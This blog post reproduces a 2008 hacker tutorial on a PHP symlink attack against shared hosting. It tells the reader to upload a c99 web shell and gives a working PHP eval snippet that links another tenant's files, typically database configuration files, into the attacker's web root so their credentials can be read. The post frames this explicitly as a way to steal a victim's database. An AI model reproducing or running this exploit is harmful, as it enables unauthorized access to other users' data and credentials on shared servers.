Home » , » Private Symlink (PHP) Exploit Tutorial

Private Symlink (PHP) Exploit Tutorial

Written By Unknown on Tuesday, 2 October 2012 | 14:36

~*^...Symlink(PHP) Exploit Tutorial by Silic0N...^*~


|/Private Release Date $ 29/12/2008 |
|/Site $ http://Www.AnTi-InTruDers.oRg |
|/Author $ Silic0n |

~*^...LEECHERS, DON'T MAKE ANY CHANGES IN THE Tutorial...^*~

First of all we use Symlink function to make a shortcut for any file or folder we want

that's why this function will be very useful for us to read any folder or file we want(For More Info Use Google).

Here We are using the Shell Named "c99" to execute the small code of php(Eval Code) on the shared hosting server.

The Exploit is used to download the victim's database If and only if the victim is in a shared host


Download the below Shell & Follow the steps.

================================================== ==============
Get Any C99 Shell
================================================== ==============

/Step 1 $ Upload the php i.e Shell_Silic0n.php

Shell on your root path. That is /home/hackerz/public_html .

/Step 2 $ Open the uploaded file . The path will look like

================================================== ==============================​==
http://www.yoursitename.com/shell_Silic0n.php
================================================== ==============================​==


/Step 3 $ Next Step is read carefully the below php Eval Code . it's about 10 lines of php code.


!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!​!!!

$filepath='/home/xx/public_html/xx.xx';
$sitepath='/home/xx/public_html/';
$writeblefilepath='myfile.txt';$flib=$sitepath.$wr iteblefilepath;
@unlink($flib);
symlink($filepath, $flib);
echo readlink($flib) . "\n";
echo "<textarea cols=30 rows=10>".file_get_contents("http://" . $_SERVER['HTTP_HOST'] . "/" . $writeblefilepath)."</tex" . "tarea>";
@unlink($flib);

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!​!!!!

/Step 4 $ You should replace (xx) in the code in the upper two lines.

In the 1st xx in the line one, means the target username.

In the 2nd xx.xx in the line one, means the target file full path in other word it's

usually used to read database configuration files to to steel it's connection information.

xx in the line two, means your username. "For Eg :- /home/Your_Ass/public_html/configuration.php"

$writeblefilepath, to enter any writable path on your site & also it is used fo to do the link process,

and write the output.For @unlink you can search for them on php.net .


credit to author 
Share this article :

Post a Comment

 
Support : Creating Website | Johny Template | Mas Template
Copyright © 2011. Turorial Grapich Design and Blog Design - All Rights Reserved
Template Created by Creating Website Published by Mas Template
Proudly powered by Blogger